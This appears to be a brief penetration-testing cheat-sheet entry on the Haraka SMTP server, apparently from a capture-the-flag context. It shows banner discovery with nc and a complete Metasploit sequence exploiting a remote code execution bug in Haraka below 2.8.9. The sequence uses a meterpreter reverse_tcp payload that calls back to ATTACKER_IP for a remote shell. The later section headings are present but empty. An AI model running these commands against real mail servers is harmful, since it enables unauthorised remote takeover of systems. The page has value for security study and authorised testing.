Haraka SMTP
Discovery
# Haraka typically runs on port 25 or 1025
nc TARGET 1025
# 220 redcross ESMTP Haraka 2.8.8 readyCVE: Haraka < 2.8.9 RCE via Attachment Plugin
Exploit - Metasploit Module
msfconsole
use exploit/linux/smtp/haraka
set RHOST TARGET
set RPORT 1025
set EMAIL_FROM [email protected]
set EMAIL_TO [email protected]
set SRVHOST ATTACKER_IP
set SRVPORT 8080
set LHOST ATTACKER_IP
set LPORT 9002
set PAYLOAD linux/x64/meterpreter/reverse_tcp
exploitHow the Exploit Works
Troubleshooting
Post-Exploitation
References
Last updated